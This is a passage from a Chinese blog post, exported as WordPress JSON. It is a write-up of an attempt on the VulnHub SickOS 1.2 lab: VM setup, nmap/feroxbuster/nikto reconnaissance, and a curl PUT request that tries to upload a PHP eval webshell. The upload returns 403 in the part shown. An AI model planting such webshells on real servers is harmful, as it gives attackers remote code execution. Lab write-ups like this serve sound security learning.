{"id":358,"date":"2024-02-07T13:22:03","date_gmt":"2024-02-07T05:22:03","guid":{"rendered":"http:\/\/162.14.82.114\/?p=358"},"modified":"2024-02-07T13:22:03","modified_gmt":"2024-02-07T05:22:03","slug":"vulnhub-sickos1-2%e5%a4%b1%e8%b4%a5","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/358\/02\/07\/2024\/","title":{"rendered":"Vulnhub&#8211;SICKOS:1.2(\u5931\u8d25)"},"content":{"rendered":"<h1>SICKOS: 1.2\uff08\u5931\u8d25\uff09<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320647.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320647.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205113022726\" \/><\/div><\/p>\n<h2>\u9009\u62e9\u6253\u5f00\u73af\u5883\uff08VMware\uff09<\/h2>\n<p>\u53ef\u4ee5\u4f7f\u7528<code>VMware<\/code>\u6253\u5f00\uff0c<code>VirtualBox<\/code>\u6253\u5f00\u4f1a\u51fa\u73b0\u95ee\u9898\uff0c\u6309\u7167\u4fee\u6539\uff0c\u5c06<code>.ovf<\/code>\u6587\u4ef6\u4e2d\u6240\u6709\u7684<code>ElementName<\/code>\u6539\u4e3a<code>Caption<\/code>\uff0c\u6240\u6709\u7684<code>vmware.sata.ahci<\/code>\u6539\u4e3a<code>AHCI<\/code>\uff0c\u5220\u9664<code>.mf<\/code>\u6587\u4ef6\uff0c\u91cd\u65b0\u5bfc\u5165\uff01<\/p>\n<p>\u6211\u4eec\u660e\u77e5\u5c71\u6709\u864e\u504f\u5411\u864e\u5c71\u884c\uff0c\u4f7f\u7528<code>VirtualBox<\/code>\u6253\u5f00\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320649.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320649.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205114013097\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u770b\u8d77\u6765\u5341\u5206\u7684\u6b63\u5e38\uff0c\u5b9e\u9645\u6211\u4eec\u626b\u4e00\u4e0b\u4f1a\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320651.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320651.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205114457184\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u626b\u4e0d\u51fa\u6765\uff0c\u5207\u6362\u81f3<code>NAT<\/code>\u8fde\u63a5\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320652.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320652.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205114717392\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320653.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320653.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205114922061\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u626b\u4e0d\u5230\uff0c\u4e0d\u6d6a\u8d39\u65f6\u95f4\u5728\u8fd9\u65b9\u9762\u4e86\uff0c\u4f7f\u7528<code>vmdk<\/code>\u6587\u4ef6\u5427\uff1a\uff08\u8001\u6837\u5b50\u521b\u5efa\u65b0\u865a\u62df\u673a\uff0c\u5bfc\u5165\u539f\u6709\u786c\u76d8\u5373\u53ef\uff09<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320654.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320654.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205115432424\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u626b\u51fa\u6765\u4e86\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320655.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320655.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205115540584\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e00\u5207\u6b63\u5e38\uff0c\u4e0b\u9762\u53ef\u4ee5\u5f00\u59cb\u8fdb\u884c\u516c\u9e21\u8fa3\uff01<\/p>\n<blockquote>\n<p>&quot;Antivirus software company&quot; 
\u6307\u7684\u662f\u63d0\u4f9b\u9632\u75c5\u6bd2\u8f6f\u4ef6\u7684\u516c\u53f8\uff0c\u8fd9\u4e9b\u516c\u53f8\u4e13\u6ce8\u4e8e\u5f00\u53d1\u548c\u63d0\u4f9b\u7528\u4e8e\u68c0\u6d4b\u3001\u9632\u6b62\u548c\u6e05\u9664\u8ba1\u7b97\u673a\u75c5\u6bd2\u7684\u8f6f\u4ef6\u3002\u8fd9\u7c7b\u8f6f\u4ef6\u901a\u5e38\u88ab\u8bbe\u8ba1\u7528\u4e8e\u4fdd\u62a4\u8ba1\u7b97\u673a\u7cfb\u7edf\u3001\u7f51\u7edc\u548c\u6570\u636e\u514d\u53d7\u6076\u610f\u8f6f\u4ef6\u3001\u75c5\u6bd2\u548c\u5176\u4ed6\u5b89\u5168\u5a01\u80c1\u7684\u4fb5\u5bb3\u3002<\/p>\n<\/blockquote>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-shell\">rustscan -a 192.168.244.183\n# PORT   STATE SERVICE REASON\n# 22\/tcp open  ssh     syn-ack ttl 64\n# 80\/tcp open  http    syn-ack ttl 64<\/code><\/pre>\n<pre><code class=\"language-shell\">nmap -sV -p- -A  192.168.244.183 \n# PORT   STATE SERVICE VERSION\n# 22\/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)\n# | ssh-hostkey: \n# |   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)\n# |   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)\n# |_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)\n# 80\/tcp open  http    lighttpd 1.4.28\n# |_http-server-header: lighttpd\/1.4.28\n# |_http-title: Site doesn&#039;t have a title (text\/html).\n# Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u4fe1\u606f\u67e5\u8be2<\/h3>\n<p>\u626b\u63cf\u592a\u6162\u5566\uff0c\u6253\u5f00\u6e90\u4ee3\u7801\u770b\u770b\uff0c\u5565\u90fd\u6ca1\u6709\u3002<\/p>\n<p><code>Wappalyzer<\/code>\u63d2\u4ef6\u67e5\u770b\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320656.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320656.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205120139742\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-shell\">feroxbuster -u http:\/\/192.168.244.183\n# 301      GET        0l        0w        0c http:\/\/192.168.244.183\/test =&gt; http:\/\/192.168.244.183\/test\/\n# 200      GET      123l      992w    84849c http:\/\/192.168.244.183\/blow.jpg\n# 200      GET       96l       10w      163c http:\/\/192.168.244.183\/\n# 403      GET       11l       26w      345c http:\/\/192.168.244.183\/~\n# 403      GET       11l       26w      345c http:\/\/192.168.244.183\/~sys~<\/code><\/pre>\n<pre><code class=\"language-shell\">gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/192.168.244.183 -f -t 200\n# \/test\/                (Status: 200) [Size: 1360]<\/code><\/pre>\n<p>\u90fd\u663e\u793a<code>test<\/code>\u5b58\u5728\uff0c\u5c1d\u8bd5\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320657.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320657.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205121041933\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6709\u4e00\u4e2a\u76ee\u5f55\uff0c\u770b\u4e00\u4e0b\u7ed3\u6784\uff0c\u70b9\u4e00\u4e0b<code>Parent Directory<\/code>\uff0c\u53c8\u5f39\u56de\u53bb\u4e86\u3002\u3002\u3002<\/p>\n<h3>\u7f51\u7ad9\u6307\u7eb9\u8bc6\u522b<\/h3>\n<pre><code class=\"language-shell\">whatweb 192.168.244.183\n# http:\/\/192.168.244.183 [200 OK] Country[RESERVED][ZZ], HTTPServer[lighttpd\/1.4.28], IP[192.168.244.183], PHP[5.3.10-1ubuntu3.21], X-Powered-By[PHP\/5.3.10-1ubuntu3.21], lighttpd[1.4.28]<\/code><\/pre>\n<h3>enum4linux<\/h3>\n<pre><code class=\"language-shell\">enum4linux 192.168.244.183<\/code><\/pre>\n<p>\u53ea\u67e5\u5230\u4e86\u4e00\u4e9b\u7528\u6237\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320658.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320658.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205215358703\" style=\"zoom: 67%;\" \/><\/div><\/p>\n<h3>nikto\u626b\u63cf<\/h3>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          192.168.244.183\n+ Target Hostname:    192.168.244.183\n+ Target Port:        80\n+ Start Time:         2024-02-06 
22:56:56 (GMT-5)\n---------------------------------------------------------------------------\n+ Server: lighttpd\/1.4.28\n+ \/: Retrieved x-powered-by header: PHP\/5.3.10-1ubuntu3.21.\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .\n+ \/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184\n+ \/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184\n+ \/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184\n+ \/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184\n+ \/test\/: Directory indexing found.\n+ \/test\/: This might be interesting.\n+ \/#wp-config.php#: #wp-config.php# file found. 
This file contains the credentials.\n+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host\n+ End Time:           2024-02-06 22:57:07 (GMT-5) (11 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested\n<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u5c1d\u8bd5lighttpd\u670d\u52a1\u6f0f\u6d1e\uff08\u5931\u8d25\uff09<\/h3>\n<p>\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a<code>lighttpd 1.4.28<\/code>\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320659.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320659.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205121344632\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u6ca1\u6709\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u6765\u83b7\u53d6flag\u7684\u6f0f\u6d1e\u3002\u3002\u3002<\/p>\n<h3>put\u4e0a\u4f20\u6f0f\u6d1e<\/h3>\n<p>\u4f7f\u7528\u547d\u4ee4\u67e5\u770b\u4e00\u4e0b\u53c2\u6570\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">curl -v -X OPTIONS http:\/\/192.168.244.183\/test\/\n# -v: \u57fa\u672c\u7684\u8be6\u7ec6\u6a21\u5f0f\uff0c\u663e\u793a\u8bf7\u6c42\u7684\u76f8\u5173\u4fe1\u606f\uff0c\u5982\u8bf7\u6c42\u5934\u548c\u54cd\u5e94\u5934\u3002\n# -vv: \u66f4\u8be6\u7ec6\u7684\u6a21\u5f0f\uff0c\u663e\u793a\u8be6\u7ec6\u7684\u8bf7\u6c42\u548c\u54cd\u5e94\u4fe1\u606f\uff0c\u5305\u62ec\u6bcf\u4e00\u6b65\u7684\u7ec6\u8282\u3002\n# -vvv: 
\u6700\u8be6\u7ec6\u7684\u6a21\u5f0f\uff0c\u663e\u793a\u6bcf\u4e00\u4e2a\u6570\u636e\u5305\u7684\u8be6\u7ec6\u4fe1\u606f\uff0c\u5305\u62ec TCP \u8fde\u63a5\u7684\u5efa\u7acb\u3001SSL\/TLS \u63e1\u624b\u7b49\u3002\n# -X OPTIONS: \u4f7f\u7528 OPTIONS \u65b9\u6cd5\u3002OPTIONS \u65b9\u6cd5\u901a\u5e38\u7528\u4e8e\u8bf7\u6c42\u76ee\u6807\u8d44\u6e90\u7684\u901a\u4fe1\u9009\u9879\uff0c\u6216\u8005\u67e5\u8be2\u670d\u52a1\u5668\u652f\u6301\u7684\u65b9\u6cd5\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u5b83\u8868\u793a\u53d1\u9001\u4e00\u4e2a OPTIONS \u8bf7\u6c42\u3002\n# http:\/\/192.168.244.183\/test\/: \u8bf7\u6c42\u7684\u76ee\u6807 URL\uff0c\u5176\u4e2d http:\/\/ \u662f\u534f\u8bae\uff0c192.168.244.183 \u662f\u4e3b\u673a\u5730\u5740\uff0c\/test\/ \u662f\u8bf7\u6c42\u7684\u8def\u5f84\u3002<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320660.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320660.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205220429070\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5141\u8bb8\u591a\u9879\u8bf7\u6c42\u65b9\u6cd5\uff0c\u8fd9\u91cc\u53d1\u73b0\u4e86<code>put<\/code>\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u81ea\u5df1\u7684\u6076\u610f\u6587\u4ef6\uff01\u53ef\u4ee5\u53c2\u8003\uff1a<a href=\"https:\/\/zhuanlan.zhihu.com\/p\/41454441\">https:\/\/zhuanlan.zhihu.com\/p\/41454441<\/a><\/p>\n<p>\u7136\u540e\u8fdb\u884c\u4e0a\u4f20 shell 
\u811a\u672c\uff1a<\/p>\n<h4>\u4e00\u53e5\u8bdd\u6728\u9a6c+\u8681\u5251<\/h4>\n<p>\u4e0a\u4f20\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-shell\">curl -v -X PUT -d &#039;&lt;?php @eval($_GET[&quot;hack&quot;]);?&gt;&#039; http:\/\/192.168.244.183\/test\/webshell.php<\/code><\/pre>\n<p>\u4f46\u662f\u6211\u8fd9\u91cc\u603b\u662f\u51fa\u73b0\u62a5\u9519\uff0c\u4e0d\u77e5\u9053\u4e3a\u5565\uff1a<\/p>\n<pre><code class=\"language-text\">*   Trying 192.168.244.183:80...\n* Connected to 192.168.244.183 (192.168.244.183) port 80\n> PUT \/test\/webshell.php HTTP\/1.1\n> Host: 192.168.244.183\n> User-Agent: curl\/8.5.0\n> Accept: *\/*\n> Content-Length: 29\n> Content-Type: application\/x-www-form-urlencoded\n> \n&lt; HTTP\/1.1 403 Forbidden\n&lt; Content-Type: text\/html\n&lt; Content-Length: 345\n&lt; Date: Tue, 06 Feb 2024 15:27:37 GMT\n&lt; Server: lighttpd\/1.4.28\n&lt; \n&lt;?xml version=&quot;1.0&quot; encoding=&quot;iso-8859-1&quot;?&gt;\n&lt;!DOCTYPE html PUBLIC &quot;-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN&quot;\n         &quot;http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd&quot;&gt;\n&lt;html xmlns=&quot;http:\/\/www.w3.org\/1999\/xhtml&quot; xml:lang=&quot;en&quot; lang=&quot;en&quot;&gt;\n &lt;head&gt;\n  &lt;title&gt;403 - Forbidden&lt;\/title&gt;\n &lt;\/head&gt;\n &lt;body&gt;\n  &lt;h1&gt;403 - Forbidden&lt;\/h1&gt;\n &lt;\/body&gt;\n&lt;\/html&gt;\n* Connection #0 to host 192.168.244.183 left intact<\/code><\/pre>\n<p>\u8fd9\u91cc\u89c9\u5f97\u53ef\u80fd\u662f\u56e0\u4e3a<code>curl<\/code>\u9ed8\u8ba4<code>HTTP1.1<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">curl -v -X PUT -d &#039;&lt;?php @eval($_GET[&quot;hack&quot;]);?&gt;&#039; http:\/\/192.168.244.183\/test\/webshell.php -0<\/code><\/pre>\n<p>\u8fd8\u662f\u4e0d\u884c\uff1a<\/p>\n<pre><code class=\"language-shell\">*   Trying 192.168.244.183:80...\n* Connected to 192.168.244.183 (192.168.244.183) port 80\n> PUT \/test\/webshell.php HTTP\/1.0\n> Host: 
192.168.244.183\n> User-Agent: curl\/8.5.0\n> Accept: *\/*\n> Content-Length: 29\n> Content-Type: application\/x-www-form-urlencoded\n> \n* HTTP 1.0, assume close after body\n&lt; HTTP\/1.0 403 Forbidden\n&lt; Content-Type: text\/html\n&lt; Content-Length: 345\n&lt; Connection: close\n&lt; Date: Tue, 06 Feb 2024 16:52:35 GMT\n&lt; Server: lighttpd\/1.4.28\n&lt; \n&lt;?xml version=&quot;1.0&quot; encoding=&quot;iso-8859-1&quot;?&gt;\n&lt;!DOCTYPE html PUBLIC &quot;-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN&quot;\n         &quot;http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd&quot;&gt;\n&lt;html xmlns=&quot;http:\/\/www.w3.org\/1999\/xhtml&quot; xml:lang=&quot;en&quot; lang=&quot;en&quot;&gt;\n &lt;head&gt;\n  &lt;title&gt;403 - Forbidden&lt;\/title&gt;\n &lt;\/head&gt;\n &lt;body&gt;\n  &lt;h1&gt;403 - Forbidden&lt;\/h1&gt;\n &lt;\/body&gt;\n&lt;\/html&gt;\n* Closing connection<\/code><\/pre>\n<p>\u4e0d\u77e5\u9053\u4e3a\u5565\uff0c\u76f4\u63a5\u6293\u5305\u8fdb\u884c\u5c1d\u8bd5\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320661.png'><img class=\"lazyload lazyload-style-2\" 